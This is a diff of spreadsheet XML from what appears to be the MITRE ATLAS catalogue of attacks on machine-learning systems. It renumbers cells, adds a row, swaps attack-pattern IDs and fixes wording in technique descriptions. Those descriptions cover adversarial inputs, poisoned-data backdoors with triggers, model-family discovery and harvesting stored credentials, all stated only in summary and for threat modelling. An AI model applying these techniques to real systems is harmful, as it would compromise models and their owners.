-        <v>537</v>
+        <v>539</v>
       </c>
       <c r="D2" t="s">
-        <v>556</v>
+        <v>559</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>575</v>
+        <v>579</v>
       </c>
       <c r="F2" t="s">
         <v>419</v>
@@ -5500,16 +5521,16 @@
         <v>500</v>
       </c>
       <c r="B3" t="s">
-        <v>519</v>
+        <v>520</v>
       </c>
       <c r="C3" t="s">
-        <v>538</v>
+        <v>540</v>
       </c>
       <c r="D3" t="s">
-        <v>557</v>
+        <v>560</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>576</v>
+        <v>580</v>
       </c>
       <c r="F3" t="s">
         <v>419</v>
@@ -5523,16 +5544,16 @@
         <v>501</v>
       </c>
       <c r="B4" t="s">
-        <v>520</v>
+        <v>521</v>
       </c>
       <c r="C4" t="s">
-        <v>539</v>
+        <v>541</v>
       </c>
       <c r="D4" t="s">
-        <v>558</v>
+        <v>561</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>577</v>
+        <v>581</v>
       </c>
       <c r="F4" t="s">
         <v>419</v>
@@ -5546,16 +5567,16 @@
         <v>502</v>
       </c>
       <c r="B5" t="s">
-        <v>521</v>
+        <v>522</v>
       </c>
       <c r="C5" t="s">
-        <v>540</v>
+        <v>542</v>
       </c>
       <c r="D5" t="s">
-        <v>559</v>
+        <v>562</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>578</v>
+        <v>582</v>
       </c>
       <c r="F5" t="s">
         <v>419</v>
@@ -5569,16 +5590,16 @@
         <v>503</v>
       </c>
       <c r="B6" t="s">
-        <v>522</v>
+        <v>523</v>
       </c>
       <c r="C6" t="s">
-        <v>541</v>
+        <v>543</v>
       </c>
       <c r="D6" t="s">
-        <v>560</v>
+        <v>563</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>579</v>
+        <v>583</v>
       </c>
       <c r="F6" t="s">
         <v>419</v>
@@ -5592,16 +5613,16 @@
         <v>504</v>
       </c>
       <c r="B7" t="s">
-        <v>523</v>
+        <v>524</v>
       </c>
       <c r="C7" t="s">
-        <v>542</v>
+        <v>544</v>
       </c>
       <c r="D7" t="s">
-        <v>561</v>
+        <v>564</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>580</v>
+        <v>584</v>
       </c>
       <c r="F7" t="s">
         <v>419</v>
@@ -5615,16 +5636,16 @@
         <v>505</v>
       </c>
       <c r="B8" t="s">
-        <v>524</v>
+        <v>525</v>
       </c>
       <c r="C8" t="s">
-        <v>543</v>
+        <v>545</v>
       </c>
       <c r="D8" t="s">
-        <v>562</v>
+        <v>565</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>581</v>
+        <v>585</v>
       </c>
       <c r="F8" t="s">
         <v>419</v>
@@ -5638,16 +5659,16 @@
         <v>506</v>
       </c>
       <c r="B9" t="s">
-        <v>525</v>
+        <v>526</v>
       </c>
       <c r="C9" t="s">
-        <v>544</v>
+        <v>546</v>
       </c>
       <c r="D9" t="s">
-        <v>563</v>
+        <v>566</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>582</v>
+        <v>586</v>
       </c>
       <c r="F9" t="s">
         <v>419</v>
@@ -5661,16 +5682,16 @@
         <v>507</v>
       </c>
       <c r="B10" t="s">
-        <v>526</v>
+        <v>527</v>
       </c>
       <c r="C10" t="s">
-        <v>545</v>
+        <v>547</v>
       </c>
       <c r="D10" t="s">
-        <v>564</v>
+        <v>567</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>583</v>
+        <v>587</v>
       </c>
       <c r="F10" t="s">
         <v>419</v>
@@ -5684,16 +5705,16 @@
         <v>508</v>
       </c>
       <c r="B11" t="s">
-        <v>527</v>
+        <v>528</v>
       </c>
       <c r="C11" t="s">
-        <v>546</v>
+        <v>548</v>
       </c>
       <c r="D11" t="s">
-        <v>565</v>
+        <v>568</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>584</v>
+        <v>588</v>
       </c>
       <c r="F11" t="s">
         <v>419</v>
@@ -5707,16 +5728,16 @@
         <v>509</v>
       </c>
       <c r="B12" t="s">
-        <v>528</v>
+        <v>529</v>
       </c>
       <c r="C12" t="s">
-        <v>547</v>
+        <v>549</v>
       </c>
       <c r="D12" t="s">
-        <v>566</v>
+        <v>569</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>585</v>
+        <v>589</v>
       </c>
       <c r="F12" t="s">
         <v>419</v>
@@ -5730,16 +5751,16 @@
         <v>510</v>
       </c>
       <c r="B13" t="s">
-        <v>529</v>
+        <v>530</v>
       </c>
       <c r="C13" t="s">
-        <v>548</v>
+        <v>550</v>
       </c>
       <c r="D13" t="s">
-        <v>567</v>
+        <v>570</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>586</v>
+        <v>590</v>
       </c>
       <c r="F13" t="s">
         <v>419</v>
@@ -5753,16 +5774,16 @@
         <v>511</v>
       </c>
       <c r="B14" t="s">
-        <v>530</v>
+        <v>531</v>
       </c>
       <c r="C14" t="s">
-        <v>549</v>
+        <v>551</v>
       </c>
       <c r="D14" t="s">
-        <v>568</v>
+        <v>571</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>587</v>
+        <v>591</v>
       </c>
       <c r="F14" t="s">
         <v>419</v>
@@ -5776,16 +5797,16 @@
         <v>512</v>
       </c>
       <c r="B15" t="s">
-        <v>531</v>
+        <v>532</v>
       </c>
       <c r="C15" t="s">
-        <v>550</v>
+        <v>552</v>
       </c>
       <c r="D15" t="s">
-        <v>569</v>
+        <v>572</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>588</v>
+        <v>592</v>
       </c>
       <c r="F15" t="s">
         <v>419</v>
@@ -5799,16 +5820,16 @@
         <v>513</v>
       </c>
       <c r="B16" t="s">
-        <v>532</v>
+        <v>533</v>
       </c>
       <c r="C16" t="s">
-        <v>551</v>
+        <v>553</v>
       </c>
       <c r="D16" t="s">
-        <v>570</v>
+        <v>573</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>589</v>
+        <v>593</v>
       </c>
       <c r="F16" t="s">
         <v>419</v>
@@ -5822,16 +5843,16 @@
         <v>514</v>
       </c>
       <c r="B17" t="s">
-        <v>533</v>
+        <v>534</v>
       </c>
       <c r="C17" t="s">
-        <v>552</v>
+        <v>554</v>
       </c>
       <c r="D17" t="s">
-        <v>571</v>
+        <v>574</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>590</v>
+        <v>594</v>
       </c>
       <c r="F17" t="s">
         <v>419</v>
@@ -5845,16 +5866,16 @@
         <v>515</v>
       </c>
       <c r="B18" t="s">
-        <v>534</v>
+        <v>535</v>
       </c>
       <c r="C18" t="s">
-        <v>553</v>
+        <v>555</v>
       </c>
       <c r="D18" t="s">
-        <v>572</v>
+        <v>575</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>591</v>
+        <v>595</v>
       </c>
       <c r="F18" t="s">
         <v>419</v>
@@ -5868,16 +5889,16 @@
         <v>516</v>
       </c>
       <c r="B19" t="s">
-        <v>535</v>
+        <v>536</v>
       </c>
       <c r="C19" t="s">
-        <v>554</v>
+        <v>556</v>
       </c>
       <c r="D19" t="s">
-        <v>573</v>
+        <v>576</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>592</v>
+        <v>596</v>
       </c>
       <c r="F19" t="s">
         <v>419</v>
@@ -5891,21 +5912,44 @@
         <v>517</v>
       </c>
       <c r="B20" t="s">
-        <v>536</v>
+        <v>537</v>
       </c>
       <c r="C20" t="s">
-        <v>555</v>
+        <v>557</v>
       </c>
       <c r="D20" t="s">
-        <v>574</v>
+        <v>577</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>593</v>
+        <v>597</v>
       </c>
       <c r="F20" t="s">
         <v>419</v>
       </c>
       <c r="G20" t="s">
+        <v>419</v>
+      </c>
+    </row>
+    <row r="21" spans="1:7">
+      <c r="A21" t="s">
+        <v>518</v>
+      </c>
+      <c r="B21" t="s">
+        <v>538</v>
+      </c>
+      <c r="C21" t="s">
+        <v>558</v>
+      </c>
+      <c r="D21" t="s">
+        <v>578</v>
+      </c>
+      <c r="E21" s="2" t="s">
+        <v>598</v>
+      </c>
+      <c r="F21" t="s">
+        <v>419</v>
+      </c>
+      <c r="G21" t="s">
         <v>419</v>
       </c>
     </row>
@@ -5930,6 +5974,7 @@
     <hyperlink ref="E18" r:id="rId17"/>
     <hyperlink ref="E19" r:id="rId18"/>
     <hyperlink ref="E20" r:id="rId19"/>
+    <hyperlink ref="E21" r:id="rId20"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -292,250 +292,250 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--4fb3f968-42a6-43da-ae93-5f165afa82e3</t>
-  </si>
-  <si>
-    <t>attack-pattern--99ee109d-c2d0-48cc-9960-d1d2a9ecd0ad</t>
-  </si>
-  <si>
-    <t>attack-pattern--68b13c6b-c45d-4864-8186-189c77eaeb4d</t>
-  </si>
-  <si>
-    <t>attack-pattern--4d881f79-6a16-4e84-a795-4f3914045e67</t>
-  </si>
-  <si>
-    <t>attack-pattern--b6a3ddcc-60d7-4ae8-b702-eca52e3ace5d</t>
-  </si>
-  <si>
-    <t>attack-pattern--f4242e1a-203a-4b26-8a7f-967458b3751a</t>
-  </si>
-  <si>
-    <t>attack-pattern--1a328de1-1327-4ed3-98c0-0a2e9da558c0</t>
-  </si>
-  <si>
-    <t>attack-pattern--0dc3c131-1524-486e-a653-52240e95a22a</t>
-  </si>
-  <si>
-    <t>attack-pattern--e641274e-cac2-49c4-800f-abd0c0d825cd</t>
-  </si>
-  <si>
-    <t>attack-pattern--047c1235-9c18-4425-8494-6f8a75feabce</t>
-  </si>
-  <si>
-    <t>attack-pattern--35bd4e6e-9056-4115-9395-81735cfd1761</t>
-  </si>
-  <si>
-    <t>attack-pattern--d93718ee-12c5-4f76-9845-1bb14f948513</t>
-  </si>
-  <si>
-    <t>attack-pattern--36a77758-5a44-48e9-9545-14bd0a54756d</t>
-  </si>
-  <si>
-    <t>attack-pattern--acebf60b-3f22-4c75-a74f-4da8788fae17</t>
-  </si>
-  <si>
-    <t>attack-pattern--ff90c91c-2f51-48db-bc3c-e1d1ebf093f3</t>
-  </si>
-  <si>
-    <t>attack-pattern--2e3499bf-169b-4b77-ae04-c689e53a9895</t>
-  </si>
-  <si>
-    <t>attack-pattern--0ba8d50c-bbcc-4b6b-ac2d-0d78fdae0422</t>
-  </si>
-  <si>
-    <t>attack-pattern--50d26291-d3ac-451f-b051-3159ba12f39e</t>
-  </si>
-  <si>
-    <t>attack-pattern--05c6f7a3-1f8a-443d-a3d7-b4d54ab28e8c</t>
-  </si>
-  <si>
-    <t>attack-pattern--87f481a5-f4f5-4aa8-b19a-854634bdf08f</t>
-  </si>
-  <si>
-    <t>attack-pattern--61527318-c59b-4097-840c-adf9961bad42</t>
-  </si>
-  <si>
-    <t>attack-pattern--c3e09f44-3ff9-4db9-bf26-6a42bbcfbbb1</t>
-  </si>
-  <si>
-    <t>attack-pattern--a5f36bcf-f003-4bde-bd38-873ecb1160c6</t>
-  </si>
-  <si>
-    <t>attack-pattern--501caefa-6ffd-496b-be90-c644e9dc8037</t>
-  </si>
-  <si>
-    <t>attack-pattern--c3c55a49-99c1-4613-994a-9948228ef0c8</t>
-  </si>
-  <si>
-    <t>attack-pattern--dbd25a74-6024-4e30-9ba2-20428a447b70</t>
-  </si>
-  <si>
-    <t>attack-pattern--a0205c5e-9527-4020-8927-26c855a45008</t>
-  </si>
-  <si>
-    <t>attack-pattern--37d808a2-ca53-4b8f-a5c9-1dfc4bc59d6f</t>
-  </si>
-  <si>
-    <t>attack-pattern--5c4401a9-b406-4cbd-9c2d-af905a927c23</t>
-  </si>
-  <si>
-    <t>attack-pattern--22fd9008-0257-448b-a013-e253ece129e7</t>
-  </si>
-  <si>
-    <t>attack-pattern--26e0f122-c1ef-4d64-b20a-5cd81b1a1979</t>
-  </si>
-  <si>
-    <t>attack-pattern--ef5867e1-c9cc-4e52-8044-80053e308042</t>
-  </si>
-  <si>
-    <t>attack-pattern--8e2247ab-ddb9-4105-9bca-7dc756987394</t>
-  </si>
-  <si>
-    <t>attack-pattern--4e33fd0b-b624-4aa9-9c87-69acaa29437d</t>
-  </si>
-  <si>
-    <t>attack-pattern--7adc32b4-93f3-441f-9ad4-08f8643d450e</t>
-  </si>
-  <si>
-    <t>attack-pattern--1b7c868f-f99c-4b9c-98c2-fe8608cc39c4</t>
-  </si>
-  <si>
-    <t>attack-pattern--0c25c07a-0800-4635-ac9c-fa3fbd0b571d</t>
-  </si>
-  <si>
-    <t>attack-pattern--36d540cd-e31b-457e-8ac0-f34eec004a7a</t>
-  </si>
-  <si>
-    <t>attack-pattern--4af77ce4-5699-4bc0-85e5-9a7b115a9fda</t>
-  </si>
-  <si>
-    <t>attack-pattern--8eb6f82a-6c90-44a8-bd8d-a0ba632858a5</t>
-  </si>
-  <si>
-    <t>attack-pattern--d59358df-a685-4a5d-b65b-2f81bd91bc02</t>
-  </si>
-  <si>
-    <t>attack-pattern--80a3250a-c57b-445e-a668-c9bb8bf1b136</t>
-  </si>
-  <si>
-    <t>attack-pattern--657cba2d-a94b-46ed-96c6-b0ff825e79d6</t>
-  </si>
-  <si>
-    <t>attack-pattern--e04885b8-82ed-464c-9789-fafb7fdbbe30</t>
-  </si>
-  <si>
-    <t>attack-pattern--db789568-054a-498b-b585-56e8d5ce88f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--a0da3f30-9270-418f-834e-7c79bed1065e</t>
-  </si>
-  <si>
-    <t>attack-pattern--ccd395a9-69f3-4f5e-a819-99f98bcc1c4b</t>
-  </si>
-  <si>
-    <t>attack-pattern--69268719-393f-41d3-801e-18d607474b01</t>
-  </si>
-  <si>
-    <t>attack-pattern--32287d8a-ac22-4d9f-a4ba-a55566fa8b36</t>
-  </si>
-  <si>
-    <t>attack-pattern--2308375d-743a-49ea-9fba-509a14e4a5e2</t>
-  </si>
-  <si>
-    <t>attack-pattern--21a73c23-60b5-46bc-b480-afa101fbac5f</t>
-  </si>
-  <si>
-    <t>attack-pattern--7344ac61-c0ef-484b-acb3-8ae385fcddb8</t>
-  </si>
-  <si>
-    <t>attack-pattern--4e479550-b51e-4399-bdda-4895d98f99fd</t>
-  </si>
-  <si>
-    <t>attack-pattern--7f8b61c0-e4a2-4a21-851a-7f8041a929c6</t>
-  </si>
-  <si>
-    <t>attack-pattern--2fb39d9e-2363-4672-a3c8-4c6c63c6b94c</t>
-  </si>
-  <si>
-    <t>attack-pattern--451cf23a-2346-4c3c-aa15-a629af8bb982</t>
-  </si>
-  <si>
-    <t>attack-pattern--aab01876-c6ba-4fac-a23a-25bc508e6a5c</t>
-  </si>
-  <si>
-    <t>attack-pattern--12b09c3e-46a9-4647-9df3-68cfde54ba21</t>
-  </si>
-  <si>
-    <t>attack-pattern--9d8044ed-6082-44d8-bc62-559f9296b580</t>
-  </si>
-  <si>
-    <t>attack-pattern--2f154be7-a9fa-4c5c-b446-5c4ca11049d7</t>
-  </si>
-  <si>
-    <t>attack-pattern--4719e4eb-78c9-4292-8059-a88886b65dfe</t>
-  </si>
-  <si>
-    <t>attack-pattern--481a4781-a4a9-473f-9ace-fc16e498bc27</t>
-  </si>
-  <si>
-    <t>attack-pattern--e2088636-a550-43d4-930c-603a33a024e1</t>
-  </si>
-  <si>
-    <t>attack-pattern--c46f18fa-cad2-4d24-8e9a-aa38bb49ed0d</t>
-  </si>
-  <si>
-    <t>attack-pattern--6d5ae8f7-0011-49bb-be21-6875ab3e0826</t>
-  </si>
-  <si>
-    <t>attack-pattern--689f398a-d130-4b8e-b359-5753973d8a8e</t>
-  </si>
-  <si>
-    <t>attack-pattern--92c88822-861d-4b04-b68d-56cd34ba35e1</t>
-  </si>
-  <si>
-    <t>attack-pattern--78b26a25-f4e6-48b4-9ce9-aab8bce5db7e</t>
-  </si>
-  <si>
-    <t>attack-pattern--02cec77c-40b1-418f-920b-a3f3217b669d</t>
-  </si>
-  <si>
-    <t>attack-pattern--b7dfb4dd-5325-4485-9b63-d57a63bd62d5</t>
-  </si>
-  <si>
-    <t>attack-pattern--3d802c02-cc2a-4f12-8ec5-2cfd47fa5592</t>
-  </si>
-  <si>
-    <t>attack-pattern--016a388c-d340-44a8-ab69-26a115e5f9a4</t>
-  </si>
-  <si>
-    <t>attack-pattern--91582fc7-5103-4d51-b520-1863eac391e1</t>
-  </si>
-  <si>
-    <t>attack-pattern--7b189c01-b058-4340-8500-e90b3220354a</t>
-  </si>
-  <si>
-    <t>attack-pattern--3d0968cd-f067-4b8b-a451-df6c521d3dab</t>
-  </si>
-  <si>
-    <t>attack-pattern--f81f0a08-3399-4006-9175-71a7dca2a917</t>
-  </si>
-  <si>
-    <t>attack-pattern--ea45586f-e473-43ca-a2b5-44a424eee5e6</t>
-  </si>
-  <si>
-    <t>attack-pattern--e6771085-d926-419c-831c-64cca5258442</t>
-  </si>
-  <si>
-    <t>attack-pattern--02efc53c-0695-44f1-8951-b3644058bb60</t>
-  </si>
-  <si>
-    <t>attack-pattern--3d1fb699-0cd0-420f-82ff-0f6947a10ecc</t>
-  </si>
-  <si>
-    <t>attack-pattern--9aedbc21-6bff-4826-a8a2-f8a414478fc0</t>
-  </si>
-  <si>
-    <t>attack-pattern--a562f5cf-fa56-42cb-8bca-3f39c9c8277e</t>
+    <t>attack-pattern--f84d258e-bdf5-4a55-86c6-5baacf11a693</t>
+  </si>
+  <si>
+    <t>attack-pattern--0e65f2b9-d758-4da7-8c85-b4a7db57e0ab</t>
+  </si>
+  <si>
+    <t>attack-pattern--fffc05f7-a56b-4da3-914c-9711854d58b7</t>
+  </si>
+  <si>
+    <t>attack-pattern--29f0ad47-f922-463e-a37e-665078b37865</t>
+  </si>
+  <si>
+    <t>attack-pattern--12bb3bb3-4fc4-4e4d-8989-1672d07a0779</t>
+  </si>
+  <si>
+    <t>attack-pattern--2e2e892e-984b-4cbc-8b8a-e460889619a1</t>
+  </si>
+  <si>
+    <t>attack-pattern--7a6a57da-bca7-4e44-8511-01cf1764cce8</t>
+  </si>
+  <si>
+    <t>attack-pattern--deb59ff4-c171-4d42-a38e-d730f17fbff0</t>
+  </si>
+  <si>
+    <t>attack-pattern--70f2312c-b38f-4116-908f-b1f966773835</t>
+  </si>
+  <si>
+    <t>attack-pattern--48d1c8b2-bcc2-43a4-9876-7436d0763f3d</t>
+  </si>
+  <si>
+    <t>attack-pattern--ef60d8b9-25c4-4550-9ad4-9be85f7454c8</t>
+  </si>
+  <si>
+    <t>attack-pattern--9c149338-3db5-4647-a402-44a5b39b6f57</t>
+  </si>
+  <si>
+    <t>attack-pattern--26a43256-8e9f-4b68-970c-5ae31047ac5e</t>
+  </si>
+  <si>
+    <t>attack-pattern--3d5216c2-7885-4070-a2ac-61ce9dc9add7</t>
+  </si>
+  <si>
+    <t>attack-pattern--c30c84ef-85cf-45a5-9ba6-68cd613f14b4</t>
+  </si>
+  <si>
+    <t>attack-pattern--fa9116d8-3361-4d55-8596-9e15512cde59</t>
+  </si>
+  <si>
+    <t>attack-pattern--14d1c118-8f21-477d-ba59-40a37c8907fd</t>
+  </si>
+  <si>
+    <t>attack-pattern--867688f9-2b19-4133-905f-d63cf65508b8</t>
+  </si>
+  <si>
+    <t>attack-pattern--7a41f961-9087-4da3-97d4-9f0fd32f61a3</t>
+  </si>
+  <si>
+    <t>attack-pattern--ca47098b-6891-4ef0-bf76-2fc80e260f4a</t>
+  </si>
+  <si>
+    <t>attack-pattern--2c65040c-4638-40a0-bac1-f6e77888a828</t>
+  </si>
+  <si>
+    <t>attack-pattern--d3659e5f-430b-451c-8b16-4b54e5a6c4b4</t>
+  </si>
+  <si>
+    <t>attack-pattern--c24bef4b-27f1-4a40-af66-f4ecbebb74cd</t>
+  </si>
+  <si>
+    <t>attack-pattern--2690a529-6cbe-43c0-b896-0485f57aaa38</t>
+  </si>
+  <si>
+    <t>attack-pattern--55414454-7a66-44be-b8d7-3eb172ab5aaf</t>
+  </si>
+  <si>
+    <t>attack-pattern--61d256af-5427-4295-83a8-d145574e4bc6</t>
+  </si>
+  <si>
+    <t>attack-pattern--3e48042d-3216-41c4-a4b6-c6d05275fa58</t>
+  </si>
+  <si>
+    <t>attack-pattern--3b9dbf0f-1740-401d-9cd2-42d84e63d4c1</t>
+  </si>
+  <si>
+    <t>attack-pattern--a58125ca-f6f7-42f7-8b0b-28c61371f07e</t>
+  </si>
+  <si>
+    <t>attack-pattern--9222f38d-39fe-489d-9f3b-b0f1493c3293</t>
+  </si>
+  <si>
+    <t>attack-pattern--b6bac6fd-d491-4438-bde9-e1e0242533f5</t>
+  </si>
+  <si>
+    <t>attack-pattern--b06e6fad-f780-4542-8a77-23a586fc4bd2</t>
+  </si>
+  <si>
+    <t>attack-pattern--ac3ffe91-3ff5-485f-b22f-1a8c29c29905</t>
+  </si>
+  <si>
+    <t>attack-pattern--4ded00bf-4a1d-44c8-a54b-0d9cd8650b63</t>
+  </si>
+  <si>
+    <t>attack-pattern--3b08eb54-67d8-44fa-8ee8-fa80f9ed4aca</t>
+  </si>
+  <si>
+    <t>attack-pattern--c2f2e998-09ac-42bc-9c28-dbb94719fb64</t>
+  </si>
+  <si>
+    <t>attack-pattern--d999ea10-efdb-4c4e-aa21-99df5169e58c</t>
+  </si>
+  <si>
+    <t>attack-pattern--2e1757fc-6f1c-448a-8027-af9006884e53</t>
+  </si>
+  <si>
+    <t>attack-pattern--36e0d80a-31d3-4b5d-9948-7b01ce7a2597</t>
+  </si>
+  <si>
+    <t>attack-pattern--c5adc2d1-924a-4e33-aea2-04d28865d087</t>
+  </si>
+  <si>
+    <t>attack-pattern--d3b25546-57e8-4bf0-95d4-2a68dc527c28</t>
+  </si>
+  <si>
+    <t>attack-pattern--c6cbb0f1-c62d-4fec-821a-5d1c8d2a9ab6</t>
+  </si>
+  <si>
+    <t>attack-pattern--f9320320-4952-4498-ab9c-01666e3a648e</t>
+  </si>
+  <si>
+    <t>attack-pattern--db51953d-c785-497f-ba7c-5459d6a87b8f</t>
+  </si>
+  <si>
+    <t>attack-pattern--8205238a-d1a2-467d-8d5b-6394c57195d6</t>
+  </si>
+  <si>
+    <t>attack-pattern--4d33022e-1df9-40ec-bb57-5bc4cd4ede97</t>
+  </si>
+  <si>
+    <t>attack-pattern--e2cd036d-14fa-48f9-9640-83d20859c6f0</t>
+  </si>
+  <si>
+    <t>attack-pattern--6f218799-67ae-4a31-8f66-893e1bbac1a9</t>
+  </si>
+  <si>
+    <t>attack-pattern--df039ea9-d621-46fd-828a-f99b537b6dba</t>
+  </si>
+  <si>
+    <t>attack-pattern--0f64afba-ef9b-4d51-bae4-8d882948002c</t>
+  </si>
+  <si>
+    <t>attack-pattern--ec5266cd-b135-45c6-983d-c85bc4f47c22</t>
+  </si>
+  <si>
+    <t>attack-pattern--814c1574-c3dc-4a74-b8c2-d087f7f83342</t>
+  </si>
+  <si>
+    <t>attack-pattern--72502166-71f3-46b3-a997-90a154c1bd93</t>
+  </si>
+  <si>
+    <t>attack-pattern--2b1504b5-f1c3-44ff-b8a4-8bee6da2decd</t>
+  </si>
+  <si>
+    <t>attack-pattern--cf20a7b3-ab3a-46d3-b382-0051d04a52e3</t>
+  </si>
+  <si>
+    <t>attack-pattern--a9148181-8a03-426d-959c-7ca3e9083dd2</t>
+  </si>
+  <si>
+    <t>attack-pattern--0924ffaf-71b3-460e-b406-c79fa09b1f40</t>
+  </si>
+  <si>
+    <t>attack-pattern--196fa43b-b283-44d9-bf51-596b11823fdf</t>
+  </si>
+  <si>
+    <t>attack-pattern--3db4bc83-6b83-42c4-8f6e-a6701669c4ea</t>
+  </si>
+  <si>
+    <t>attack-pattern--990b6f83-2795-4b78-8177-e8edc6ec645f</t>
+  </si>
+  <si>
+    <t>attack-pattern--409ea4e4-54ac-4981-a81f-0b08342c6e12</t>
+  </si>
+  <si>
+    <t>attack-pattern--0024d2d7-eee5-40e2-b030-231de594deaa</t>
+  </si>
+  <si>
+    <t>attack-pattern--ff7b5af1-eb50-4083-b4bb-dff7cac32a9e</t>
+  </si>
+  <si>
+    <t>attack-pattern--e4835863-bd95-412a-8a90-9b46b2ba710d</t>
+  </si>
+  <si>
+    <t>attack-pattern--7ccdc910-8651-44c1-b346-40ed08464065</t>
+  </si>
+  <si>
+    <t>attack-pattern--e93e8834-0087-439e-9ff5-8067ae326c6f</t>
+  </si>
+  <si>
+    <t>attack-pattern--f3603313-1991-4c1d-bce9-e53e9f59098d</t>
+  </si>
+  <si>
+    <t>attack-pattern--d606e63a-e87c-4591-80bd-56e069084ba3</t>
+  </si>
+  <si>
+    <t>attack-pattern--5f6941d2-afe3-4e6e-873e-ca770e4656ca</t>
+  </si>
+  <si>
+    <t>attack-pattern--37b4d9da-15b0-4484-a5fe-2f2cadbe77f2</t>
+  </si>
+  <si>
+    <t>attack-pattern--66e6cac5-a75c-4240-92a5-4b1555c595c8</t>
+  </si>
+  <si>
+    <t>attack-pattern--9efeb631-41fc-4f06-a66c-5ac95e3afb3c</t>
+  </si>
+  <si>
+    <t>attack-pattern--030eaf7f-950b-4367-ac30-d1f18aad809e</t>
+  </si>
+  <si>
+    <t>attack-pattern--b5f286c5-05f2-4ff2-ba29-55ed2ab3a6fb</t>
+  </si>
+  <si>
+    <t>attack-pattern--2367d435-f615-4318-8a7e-1b57e43796f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--11e9af8d-767c-4362-8b77-21b04b11d07c</t>
+  </si>
+  <si>
+    <t>attack-pattern--9ddbd89f-1055-49a8-80a8-a7c12271bb97</t>
+  </si>
+  <si>
+    <t>attack-pattern--d7f0ed90-f99e-41a3-95bf-c56d68a29969</t>
+  </si>
+  <si>
+    <t>attack-pattern--056a10c1-fdd7-4a8c-94b4-4e09b20c8727</t>
+  </si>
+  <si>
+    <t>attack-pattern--e815b4bb-491a-4773-9ac1-2456359c44c0</t>
+  </si>
+  <si>
+    <t>attack-pattern--ad12475f-3e43-4b41-98e5-9dcb874132a3</t>
+  </si>
+  <si>
+    <t>attack-pattern--08f770d7-8260-43e4-98f7-0b15e1028f54</t>
   </si>
   <si>
     <t>Acquire Infrastructure</t>
@@ -858,7 +858,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversarial data are inputs to a machine learning model that have been modified such that they cause the adversary's desired effect in the target model.
-Effects can range from misclassification, to missed detections, to maximising energy consumption.
+Effects can range from misclassification, to missed detections, to maximizing energy consumption.
 Typically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary's intended effect.
 For example, an adversarial input for an image classification task is an image the machine learning model would misclassify, but a human would still recognize as containing the correct class.
 Depending on the adversary's knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](/techniques/AML.T0043.000), [Black-Box Optimization](/techniques/AML.T0043.001), [Black-Box Transfer](/techniques/AML.T0043.002), or [Manual Modification](/techniques/AML.T0043.003).
@@ -889,7 +889,7 @@
     <t xml:space="preserve">Adversaries may leverage information repositories to mine valuable information.
 Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
 Information stored in a repository may vary based on the specific instance or environment.
-Specific common information repositories include Sharepoint, Confluence, and enterprise databases such as SQL Server.
+Specific common information repositories include SharePoint, Confluence, and enterprise databases such as SQL Server.
 </t>
   </si>
   <si>
@@ -926,7 +926,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversaries may discover the general family of model.
-General information about the model may be revealed in documentation, or the adversary may used carefully constructed examples and analyze the model's responses to categorize it.
+General information about the model may be revealed in documentation, or the adversary may use carefully constructed examples and analyze the model's responses to categorize it.
 Knowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.
 </t>
   </si>
@@ -1150,7 +1150,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversaries may introduce a backdoor by training the model poisoned data, or by interfering with its training process.
-The model learns to associate a adversary defined trigger with the adversary's desired output.
+The model learns to associate an adversary-defined trigger with the adversary's desired output.
 </t>
   </si>
   <si>
@@ -1197,7 +1197,7 @@
   </si>
   <si>
     <t>Much like the [Search for Victim's Publicly Available Research Materials](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models.
-This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may [Adversarial ML Attack Implementations](/techniques/AML.T0016.000) or [Adversarial ML Attacks](/techniques/AML.T0017.000) their own if necessary.</t>
+This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial ML Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial ML Attacks](/techniques/AML.T0017.000) if necessary.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may search publicly available research to learn how and where machine learning is used within a victim organization.
@@ -1264,7 +1264,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversaries may search compromised systems to find and obtain insecurely stored credentials.
-These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).
+These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system, or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).
 </t>
   </si>
   <si>
@@ -1285,7 +1285,7 @@
